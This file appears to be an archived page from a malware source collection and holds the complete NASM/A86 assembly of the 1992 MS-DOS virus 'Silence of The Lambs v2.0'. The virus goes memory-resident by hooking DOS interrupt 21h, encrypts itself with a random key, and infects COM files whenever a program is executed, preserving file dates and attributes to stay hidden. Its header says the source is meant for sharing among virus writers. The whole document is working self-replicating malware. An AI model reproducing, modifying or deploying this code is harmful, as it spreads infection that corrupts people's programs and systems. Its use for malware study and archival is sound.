MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.tsotl-b.asm
2021-01-12 18:01:59 -06:00

322 lines
6.9 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

; Silence of The Lambs v2.0
; (c) -=<: DRE/\MER :>=- of Demoralized Youth 1992
;
; THIS FILE IS FOR EDUCATION PURPOSES ONLY!
; PERMISSION IS GRANTED TO SPREAD THE SOURCE
; TO VIRUS WRITERS *ONLY*. PLEASE DO NOT MAKE
; ANY MODIFYCATIONS, UNLESS YOU ALSO INCLUDE
; THE ORIGINAL SOURCE.
;
; Assemble With A86
;
org 100h
jmp short dummy1
db 'DY'
dummy1:
mov cx,length
mov si,offset enc_start
mov ah,0
enc_key equ $-1
dummy2:
sub byte [si],ah
inc si
add ah,0
enc_add equ $-1
loop dummy2
enc_start:
mov ah,2Dh
mov ch,0FFh
mov dx,cx
int 21h
cmp al,0FFh
jne nomore
mov ax,cs
dec ax
mov ds,ax
cmp byte [0],'Z'
jne nomore
mov ax,word [3]
sub ax,pgfsize
jc nomore
sub word [3],pgfsize
sub word [12h],pgfsize
mov es,word [12h]
mov si,110h
mov di,100h
mov cx,total
cld
rep movsb
xor ax,ax
mov ds,ax
mov si,84h
mov di,old21
movsw
movsw
cli
mov word [84h+2],es
mov word [84h],offset ni21
sti
nomore:
push cs
push cs
pop es
pop ds
mov bx,0000h ;return control to the
eof equ $-2 ;end user
jmp bx
xclose: jmp close
infect:
push cs
pop ds
push cs
pop es
db 0E4h,40h
mov byte [enc_key],al
mov ax,4300h ;use CHMOD to get file attr
xor dx,dx
int 21h
mov [0F0h],cx ;store attr in PSP
mov ax,4301h ;clear file attr with CHMOD
xor cx,cx
int 21h
mov ax,3D02h ;open file for read / write
int 21h
xchg bx,ax
lahf
push ax
mov ax,5700h ;get file date & time
int 21h
mov [0F2h],cx
mov [0F4h],dx
pop ax
sahf
jc xclose
mov ah,3Fh ;read from file
mov cx,total
mov dx,old
int 21h
cmp byte [old+0],'M' ;exe MZ ?
je xclose
cmp byte [old+0],'Z' ;exe ZM ?
je xclose
cmp word [old+2],'YD' ;allready infected?
je xclose
mov ax,4202h ;lseek to EOF
xor cx,cx
xor dx,dx
int 21h
cmp ah,0FAh
jae xclose
cmp ah,4
jb xclose
add ax,total+100h
mov word [00F6h],ax
mov ah,40h ;write to EOF
mov cx,total
mov dx,old
push cx
mov al,byte [enc_key]
mov si,dx
enc_app:
xor byte [si],al
inc si
loop enc_app
pop cx
int 21h
mov ah,40h ;write to EOF
mov cx,applen
mov dx,offset append
int 21h
mov ax,4200h ;lseek to beginning of file
xor cx,cx
xor dx,dx
int 21h
push [eof]
mov ax,word [00F6h]
mov [eof],ax
mov ah,byte [enc_key]
db 0E4h,40h
mov byte [enc_add],al
mov dl,al
mov si,100h
mov di,old
cld
mov cx,offset enc_start-100h
rep movsb
mov cx,length
enc:
lodsb
add al,ah
stosb
add ah,dl
loop enc
mov ah,40h ;write viral code
mov dx,old
mov cx,total
int 21h
pop [eof]
close:
mov ax,5701h
mov cx,[00F2h]
mov dx,[00F4h]
int 21h
mov ah,3Eh ;close file
int 21h
mov ax,4301h
mov cx,[00F0h]
xor dx,dx
int 21h
ret
append:
call $+3 ;replace org bytes
pop si
sub si,3+total
mov di,100h
mov cx,total
mov ah,byte [enc_key]
append_enc:
lodsb
xor al,ah
stosb
loop append_enc
mov ax,100h ;return IP to 100h when done
push ax
sub ax,ax ;zero regs
xor bx,bx
and cx,cx
sub dx,dx
xor si,si
and di,di
sub bp,bp
ret
applen equ $-offset append
ni21:
pushf
cmp ah,2Dh
jne Not_Time
cmp ch,0FFh
jne Not_Time
cmp ch,dh
jne Not_time
mov Al,0
popf
iret
Not_Time:
cld
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
; cmp ah,41h
; jne Not_Parse
; mov ah,3Ch
; cli
; add sp,18
; sti
; popf
; jmp old21-1
Not_Parse:
cmp ax,4B00h
jne Not_Exec
mov si,dx
push cs
pop es
xor di,di
mov cx,128
rep movsb
mov ax,3524h
int 21h
push es
push bx
push cs
pop ds
mov ax,2524h
mov dx,offset ni24
int 21h
call infect
pop dx
pop ds
mov ax,2524h
int 21h
Not_Exec:
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp far 0000:0000
old21 equ $-4
ni24: mov al,0
iret
db 'The Silence Of The Lambs!$'
total equ $-100h ;size
pgfsize equ (($*2)/16)+2
length equ $-offset enc_start
old equ $